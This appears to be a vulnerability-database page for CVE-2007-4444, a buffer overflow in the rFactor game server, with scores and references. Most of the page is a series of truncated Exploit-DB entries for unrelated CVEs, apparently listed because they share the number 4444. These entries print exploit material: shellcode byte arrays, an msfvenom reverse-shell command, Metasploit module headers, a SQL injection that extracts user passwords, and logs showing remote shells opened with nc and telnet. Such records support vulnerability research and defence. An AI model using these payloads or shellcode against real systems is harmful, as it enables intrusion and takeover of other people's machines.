CVE-2007-4444
Published 2007-08-21
Multiple buffer overflows in Image Space rFactor 1.250 and earlier allow remote attackers to execute arbitrary code via a packet with ID (1) 0x80 or (2) 0x88 to UDP port 34297, related to the buffer containing the server version number.
Priority: P3 (46, high)
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available
EPSS: 7.26% (93.6th percentile)
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rfactor | rfactor | — | — |
| rfactor | rfactor | — | — |
No detection rules found.
Exploit-DB: PCMan FTP Server 2.0.7 - Buffer Overflow
exploitdb · 2025-06-15 · CVSS 6.9 · CVE-2025-4255 [MEDIUM]
---
# Exploit Title: PCMan FTP Server 2.0.7 - Buffer Overflow
# Date: 04/17/2025
# Exploit Author: Fernando Mengali
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link:
https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3 - # Version 5.1 (Build 2600.xpsp.080413-3111 :
Service Pack 2)
# CVE: CVE-2025-4255
# msfvenom -p windows/shell_reverse_tcp lhost=192.168.176.136 lport=4444
EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
#offset: 2007
#badchars: \x00\x0a\x0d
#EIP: 0x74e32fd9 (JMP ESP)
my $buf =
"\xbd\xcc\x95\x24\x8c\xda\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" .
"\xb1\x52\x31\x6a\x12\x83\xc2\x04\x03\xa6\x9b\xc6\x79\xca" .
"\x4c\x84\x82\x32\x8d\xe9\x0b\xd
Exploit-DB: XM Easy Personal FTP Server 5.30 - Remote Format String Write4
exploitdb · 2012-06-14 · CVE-2007-1195
---
#!/usr/bin/python
# XM Easy Personal FTP Server v 2
# (+) Choose your option:
# 1. use no authentication (anonymous is disabled)
# 2. use authentication (anonymous is enabled)
# --> 1
# (+) Connecting to the target 192.168.153.160:21
# (+) Seeding payload...
# (+) Triggering write4....
# (+) Connecting to the targets shell!
# Connection to 192.168.153.160 4444 port [tcp/*] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Documents and Settings\steve>
#
# example exploitation against Windows Server 23k:
#
# mr_me@gliese:~/pentest/research/targets/xm$ ./poc_working.py 192.168.153.159
# -------------------------------------------------------------------------
# XM Easy Per
Exploit-DB: SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)
exploitdb · 2009-09-04 · CVE-2007-4566
---
#--attack-log--
#attacker@dz-labs:~/pentests/metasploit/framework-3.2/trunk$ ./msfcli exploit/windows/ldap/sidvault_ldap #PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 RHOST=192.168.1.3 E
#[*] Please wait while we load the module tree...
#[*] Handler binding to LHOST 0.0.0.0
#[*] Started reverse handler
#[*] Sending stage (718336 bytes)
#[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.3:1076)
#meterpreter >
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metaspl
Exploit-DB: SIDVault 2.0e - Windows Remote Buffer Overflow
exploitdb · 2009-09-03 · CVE-2007-4566
---
#!/usr/bin/python
#
# $ ./sidvault.py 192.168.1.131
#
# [*] SIDVault 2.0e Windows Remote Buffer Overflow
# [*] Written by blake
# [*] Tested on Windows XP SP3
# [+] Sending payload
# [+] Check port 4444 for shell
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys, ldap
print "\n[*] SidVault 2.0e Windows Remote Buffer Overflow"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP3"
if len(sys.argv)!=2:
print "[*] Usage: %s " % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
shellcode = (
"\x89\xe1\xd9\xe1\xd9\x71\xf4\x5d\x55\x59\x49\x49
Exploit-DB: Racer 0.5.3 Beta 5 - Remote Stack Buffer Overflow
exploitdb · 2009-03-20 · CVE-2007-4370
---
/*
Racer vs 0.5.3 beta 5 Remote Stack Buffer Overflow(C) exploit by fl0 fl0w
Description: Bug found some time ago by n00b (Cheers mate! :D). I wanted to make a more
improved sploit, with lots of targets to choose from, and C, yes, is better :D.
Tested on Win Xp Pro Sp 3 ; Compile DevC++ 4.9.9.2
Command line arguments : -ip ->the ip of your target default is 127.0.0.1
-port ->default port is 26000
-shellcode ->well guess.. :D
What does the exploit do ?
You can run :Calc.exe, Bind shell on port 4444, Win32 Adduser
I've set the default port 26000 and ip 127.0.0.1 .
How to use ? Method ?
-t 10 -ip 127.0.0.1 -port 26000
Classic buffer overflow , just jump to the payload and done !
It can be exploited using SEH method too.
*/
#include
#i
Exploit-DB: VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal
exploitdb · 2008-05-23 · CVSS 7.5 · CVE-2008-1881 [HIGH]
---
#!/usr/bin/python
#
# VLC 0.8.6d Double Sh311 Universal Exploit
# CVE-2007-6681
# Vulnerability Discovered by Michal Luczaj
#
# Coded by Muris Kurgas aka j0rgan http://www.jorgan.users.cg.yu/
# and
# Matteo Memelli aka ryujin http://www.be4mind.com - http://www.gray-world.net
# WE CODED IT JUST FOR FUN ;)
# Cheers to #offsec and all our friends :) and prelate_ hehe
#-----------------------------------------------------------------------------
#
# FIRST SHELL -> NORMAL RET OVERWRITE -> WE OWN EIP
#
# matte@badrobot:~$ telnet 192.168.1.245 4444
# Trying 192.168.1.245...
# Connected to 192.168.1.245.
# Escape character is '^]'.
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\
Exploit-DB: BadBlue 2.72 - PassThru Remote Buffer Overflow
exploitdb · 2007-12-24 · CVSS 5.0 · CVE-2007-6377 [MEDIUM]
---
#!/usr/bin/perl -w
# http://aluigi.altervista.org/adv/badblue-adv.txt
# https://www.securityfocus.com/bid/26803
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6379
# exploit for stack overflow in badblue 2.72
#
# Credit to Luigi Auriemma
# Jacopo Cervini [email protected]
# 22/12/2007
#
#
#
use IO::Socket;
if(!($ARGV[1]))
{
print "Usage: badblue-272-seh.pl \n\n";
exit;
}
# metasploit win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\
Exploit-DB: Rosoft Media Player 4.1.7 - '.m3u' Local Stack Overflow
exploitdb · 2007-12-18 · CVE-2007-6478
---
/* rosoft-player-expl.c: 2007-12-18:
*
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Rosoft Media Player
#include
/**
* Invalid chars: 0x1A 0xA 0xD 0x00
* win32_bind -
* EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub
* http://metasploit.com
*/
unsigned char uszShellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x60"
"\x90\xf0\xf7\x83\xeb\xfc\xe2\xf4\x9c\xfa\x1b\xba\x88\x69\x0f\x08"
"\x9f\xf0\x7b\x9b\x44\xb4\x7b\xb2\x5c\x1b\x8c\xf2\x18\x91\x1f\x7c"
"\x2f\x88\x7b\xa8\x40\x91\x1b\xbe\xeb\xa4\x7b\xf6\x8e\xa1\x30\x6e"
"\xcc\x14\x30\x83\x67\x51\x3a\xfa\x61\x52\x1b\x03\x5b\xc4\xd4\xdf"
"\x15\x75\x7b\xa8\x44\x91\x1b\x91\xeb\x9c\xbb\x7c\x3f\x8c\xf1\x1c"
"
Exploit-DB: IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow
exploitdb · 2007-10-27 · CVE-2007-4880
---
#!/usr/bin/python
#
# IBM Tivoli Storage Manager Express CAD Service Buffer Overflow (5.3)
# http://www.zerodayinitiative.com/advisories/ZDI-07-054.html
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# muts.at.offensive-security.com
# http://www.offensive-security.com/0day/dsmcad.py.txt
#
# bt ~ # ./dsmcad.py 192.168.1.107
# [*] IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
# [*] http://www.offensive-security.com
# [*] Connecting to 192.168.1.107
# [*] Sending evil buffer, ph33r
# [*] Check port 4444 for bindshell
#
# bt ~ # nc -v 192.168.1.107 4444
# 192.168.1.107: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.107] 4444 (krb524) open
# Microsoft Windows [Version 5.2.
Exploit-DB: eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
exploitdb · 2007-10-15 · CVE-2007-5467
---
/* extremail-v6.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BBUF_SIZE BUF_SIZE/3*4+1
#define NOP 0x41
#define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define PORT_SHELL 4444
static const char movshell_lnx[] =
"\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
"\x40" /* inc %eax */
"\xff\xe0"; /* jmp *%eax */
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x
Exploit-DB: eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow
exploitdb · 2007-10-15 · CVE-2007-5467
---
/* extremail-v4.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 8192
#define NOP 0x41
#define PAD 0 /* do you feel lucky? */
#define DEF_PORT 4501
#define PORT_ADMIN DEF_PORT
#define PORT_SHELL 4444
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xcd\x80";
#define NUM_TARGETS 2
struct target_t
{
const char *name;
const int len;
const char *zshell;
co
Exploit-DB: Eggdrop Server Module Message Handling - Remote Buffer Overflow
exploitdb · 2007-10-10 · CVE-2007-2807
---
/*
Eggdrop Server Module Message Handling Remote Buffer Overflow Vulnerability
https://www.securityfocus.com/bid/24070
discovered by Bow Sineath
tested on eggdrop 1.6.18 / linux 2.4
-exploit is a fake ircd
replace shellcode.. strip 0x00,0x0a and a few more probably.
remember to add \n at end of shellcode.
poison some dns cache or .jump
play.
-bangus/magnum
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define LISTENPORT 6667
#define BACKLOG 3
#define RETADDR 0xbffff7b9
/*
* linux/x86/shell_reverse_tcp - 99 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* LPORT=4444, LHOST=10.0.0.250
*/
unsigned char shellcode[] =
"\xbf\x1a\x2f\xf0\x55\xdb\xc9\xd9\x74\x24\xf4\x5b\x31\x
Exploit-DB: smbftpd 0.96 - SMBDirList-function Remote Format String
exploitdb · 2007-10-01 · CVE-2007-5184
---
/*
* smbftpd 0.96 Proof of concept
* tested with smbftpd 0.96 compiled with gcc 3.3.6
*
* 1. write jumpcode to `BSS`
* mov dx, 0x1234
* pop eax
* cmp ax, dx
* jne $-4
* jmp esp
* 2. overwrite a GOT entry with the addr to `BSS` & send shellcode
*
* jerry:~> ./bleh -h localhost
* [+] GOT: 0x80591d8 - .bss (jmpcode): 0x805a791
* [+] localhost:21 (user: anonymous pass: )
* [+] PASV
* [+] writing jumpcode
* [+] PASV
* [+] overwriting GOT entry and sending shellcode
* jerry:~> nc localhost 4444
* id
* uid=0(root) gid=0(root) euid=1002(ftp) egid=1002(ftp) groups=1002(ftp)
*
*
* - Jerry Illikainen
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define GOT 0x080591d8 // GOT entry for chdir
#define
Exploit-DB: gMotor2 Game Engine - Multiple Vulnerabilities
exploitdb · 2007-08-18 · CVE-2007-4444
---
source: https://www.securityfocus.com/bid/25358/info
The gMotor2 game engine is prone to multiple code-execution and denial-of-service vulnerabilities. Four vulnerabilities were reported.
These vulnerabilities may be triggered by malicious client requests to games that use the affected engine, including rFactor. Successful exploits could crash a game server or let remote attackers execute arbitrary code on the computer hosting affected software.
NOTE: This BID originally stated that the vulnerabilities were in the rFactor game. New information shows that the gMotor2 game engine and multiple games that use the engine are vulnerable. This BID was updated to reflect this new information.
https://gitlab.com/exploit-database/exploitdb-bin
Exploit-DB: PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
exploitdb · 2007-08-09 · CVE-2007-1413
---
http://milw0rm.com/exploits/4204
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1\n
telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\apache>
*/
if (!extension_loaded("snmp")) {
die("snmp extension required!");
}
$buffer = str_repeat("A",254);
$ret = "\xD7\x98\x95\x7C"; #shell32.dll ->CALL EDI WindowsXP
$shellcode=
"\xbd\xdb\xc6\x38\x8f\xd9\xc9\xd9\x74\x24\xf4\x58\x31\xc9" .
"\xb1\x51\x83\xc0\x04\x31\x68\x0e\x03\xb3\xc8\xda\x7a\xbf" .
"\xbf\xf1\xc8\xd7\xb9\xf9\x2c\xd8\x5a\x8d\xbf\x02\xbf\x1a" .
"\x7a\x76\x34\x60\x80\xfe\x4b\x76\x01\xb1\x53\x03\x49\x6d" .
"\x65\xf8\x3f\xe6\x51\x75\xbe\x16\xa8\x49\x
Exploit-DB: Rational Software Hidden Administrator 1.7 - Authentication Bypass
exploitdb · 2007-05-19 · CVE-2007-2783
---
####################################################################################
# Hidden Administrator Authentication Bypass Exploit #
# ahmed[at]rewterz.com #
# https://www.securityfocus.com/bid/24049 #
# #
# C:\>python rewt-ha-exp.py #
# Usage: rewt-ha-exp.py -h -p -t #
# make sure nc.exe exists on tftpd server #
# #
# C:\>telnet 192.168.1.4 4444 #
# C:\>python rewt-ha-exp.py -h 192.168.1.4 -p 3128 -t 192.168.1.105 #
# [+] Connecting to 192.168.1.4 #
# [+] Uploading Files #
# [+] DONE [+] #
# [+] Now Connect to port 4444 on victim IP !!! #
# #
# C:\>telnet 192.168.1.4 4444 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# C:\ha_server> #
################################
Exploit-DB: Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Local Buffer Overflow
exploitdb · 2007-04-27 · CVE-2007-2366
---
/****************************************************************************\
* *
* Photoshop CS2/CS3, Paint Shop Pro 11.20 .PNG File Buffer Overflow *
* *
* Like bitmap files, PNG files can do great things =D. *
* In french: "buffer overflow a gogo!" *
* *
* The generated .PNG file will work for: *
* -Photoshop CS2 *
* -Photoshop CS3 *
* -Photoshop Elements 5.0 *
* -Corel Paint Shop Pro 11.20 *
* *
* This sploit runs calc.exe or bind to port 4444. *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
\****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encod
Exploit-DB: FreshView 7.15 - '.psp' Local Buffer Overflow
exploitdb · 2007-04-25 · CVE-2007-2283
---
/*****************************************************************************
* *
* FreshView 7.15 .PSP File Buffer Overflow *
* *
* *
* FreshView is vulnerable to an unspecified buffer overflow when processing *
* a crafted .PSP file. *
* This exploit runs calc.exe or binds shell to port 4444. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
* *
* Note: Open that in XnView to see EIP overwritten =D *
*****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4
Exploit-DB: ABC-View Manager 1.42 - '.psp' Local Buffer Overflow
exploitdb · 2007-04-25 · CVE-2007-2284
---
/*****************************************************************************
* *
* ABC-View Manager 1.42 .PSP File Buffer Overflow *
* *
* *
* ABC-View Manager is vulnerable to an unspecified buffer overflow when *
* processing a crafted .TTF file. *
* This exploit runs calc.exe or binds shell to port 4444. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
* *
* Note: Open that in XnView to see EIP overwritten =D *
*****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x31\xc9\x83\xe9\xdd\xd
Exploit-DB: Corel Paint Shop Pro Photo 11.20 - '.clp' Local Buffer Overflow
exploitdb · 2007-04-23 · CVE-2007-2209
---
/*****************************************************************************
* *
* Corel Paint Shop Pro Photo v11.20 Unspecified .CLP File Buffer Overflow *
* *
* *
* By opening a specially crafted file, SEH can be overwritten which makes *
* code execution possible. *
* *
* This sploit runs calc.exe or binds to port 4444. *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
*****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13
Exploit-DB: ACDSee 9.0 - '.xpm' Local Buffer Overflow
exploitdb · 2007-04-22 · CVE-2007-2193
---
/*****************************************************************************
* ACDSee v9.0 .XPM File Buffer Overflow *
* *
* *
* ACDSee is vulnerable to an unspecified buffer overflow when processing a *
* crafted .XPM file. *
* This exploit runs calc.exe or binds shell to port 4444, and works against *
* ACDSee and ACDSee Quick View. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
*****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x98"
Exploit-DB: XnView 1.90.3 - '.xpm' Local Buffer Overflow
exploitdb · 2007-04-22 · CVE-2007-2194
---
/*****************************************************************************
* *
* XnView 1.90.3 .XPM File Buffer Overflow *
* *
* *
* XnView is vulnerable to a buffer overflow while processing a crafted XPM *
* File. It fails to check the length of the arguments passed to the defined *
* array which leads to code execution. *
* This exploit runs calc.exe or binds shell to port 4444. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
*****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x31\xc9\x83\
Exploit-DB: Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow
exploitdb · 2007-04-15 · CVE-2007-1748
---
#!/usr/bin/python
# Remote exploit for the 0day Windows DNS RPC service vulnerability as
# described in https://www.securityfocus.com/bid/23470/info. Tested on
# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
# and then connects to it.
#
# Cheers to metasploit for the first exploit.
# Written for educational and testing purposes.
# Author shall bear no responsibility for any damage caused by using this code
# Winny Thomas :-)
import os
import sys
import time
from impacket.dcerpc import transport, dcerpc, epm
from impacket import uuid
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode +=
Exploit-DB: IrfanView 3.99 - '.ani' Local Buffer Overflow (2)
exploitdb · 2007-04-09 · CVE-2007-1867
---
/*
IrfanView 3.99 .ANI File Buffer Overflow (Multiple Targets and port bind shell)
Old Target:
Windows XP Sp2 FR
New targets:
Windows XP SP2 Portuguese Call ESP Addr
Windows XP SP2 English Call ESP Addr
Greetz: Ricardo Fiorelli, Marsu (make this possible.. nice job!), Str0ke , Sekure.org guys!
*/
#include
#include
/* win32_exec - EXITFUNC=process Bind TCP port 4444 http://metasploit.com */
char BindShellcode[]=
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c"
"\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01"
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb"
"\x03\x2c\x8b\x8
Exploit-DB: XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
exploitdb · 2007-04-02 · CVE-2007-1974
---
#!/usr/bin/perl
#[Script Name: XOOPS Module WF-Section : ";
$dir = ;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
print "User ID (uid): ";
$id = ;
chop ($id);
$target = "9999999%20union%20select%201111,2222,3333,4444,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),6666,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$sock
Exploit-DB: WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow
exploitdb · 2007-03-14 · CVE-2007-1567
---
#!/usr/bin/python
# Remote exploit for WarFTP 1.65. Tested on Windows 2000 server SP4 inside
# VMware. A trivially exploitable stack overflow is present in WarFTP which
# can be triggered by sending a long username (>480 bytes) along with the USER
# ftp command. Maybe other commands like PASS might also be affected. I did
# not check though. This exploit binds shell on TCP port 4444 and then
# connects to it
#
# Author shall not bear any responsibility for any screw ups
# Winny Thomas :-)
import os
import sys
import time
import socket
import struct
# alphanumeric portbind shellcode from metasploit
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x3
Exploit-DB: CA BrightStor ARCserve - 'lgserver.exe' Remote Stack Overflow
exploitdb · 2007-02-01 · CVE-2007-0449
---
#!/usr/bin/python
# Remote exploit for the CA BrightStor Arcserve stack overflow as
# described in http://www.securityfocus.com/archive/1/458648/30/0/threaded
#
#
# Winny Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code
#
import os
import sys
import socket
import struct
#Portbind shellcode; Binds shell on TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54
Exploit-DB: CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)
exploitdb · 2007-01-28 · CVE-2007-0449
---
#!/usr/bin/perl
#
# original exploit by lssec.com this is a perl porting
#
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
$request = $uuid;
send $socket, $request, 0;
print "[+] Sent uuid request\n";
recv($socket, $reply, 1024, 0);
$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1006)."\r\n";
send $socket, $request, 0;
print "[+] Sent malicius 1st request\n";
$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1029)."\r\n";
send $socket, $request, 0;
print "[+] Sent malicius 2nd request\n";
print " + Connect on 4444 port of $host ...\n";
sleep(3);
system("telnet
Exploit-DB: CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (1)
exploitdb · 2007-01-27 · CVE-2007-0449
---
#!/usr/bin/python
# I couldn't find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldn't be hard
# to port to other platforms. The exploit overwrites the
# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the
# address of call dword ptr [esi +4C] located in user32.dll. At the time when
# UEF is called esi +4C contains a pointer to our shellcode.
#
# Winny M Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code
from impacket.dcerpc impor
Exploit-DB: Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Remote Buffer Overflow
exploitdb · 2007-01-03 · CVE-2007-0015
---
#!/usr/bin/python
#Port bind exploit for apple quicktime rtsp vulnerability
#Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy
#to port the exploit to others. All one needs to do is look for the appropriate
#jump address. Certain characters are not permitted in the shellcode.
#Alphanumeric shellcodes work fine.
#This script creates a qtl file which when clicked upon binds a shell to TCP
#port 4444. This file can be delivered through several means; HTTP, SMTP etc
#
# Winny Thomas ;-)
# Author shall bear no responsibility for any kind of screws up caused by using
# this code
import sys
#alpha numeric port bind shellcode from metasploit; binds shell to port 4444
shellcode = "\xeb\x03\x
No writeups or analysis indexed.
References
- http://aluigi.org/poc/rfactorx.zip
- http://forum.racesimcentral.com/showthread.php?t=298659
- http://secunia.com/advisories/26526
- http://securityreason.com/securityalert/3037
- http://www.rfactor.net/?page=news_09-26_1255
- http://www.securityfocus.com/archive/1/477023/100/0/threaded
- http://www.securityfocus.com/archive/1/480591/100/200/threaded
- http://www.securityfocus.com/archive/1/480921/100/200/threaded
- http://www.securityfocus.com/bid/25358
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36093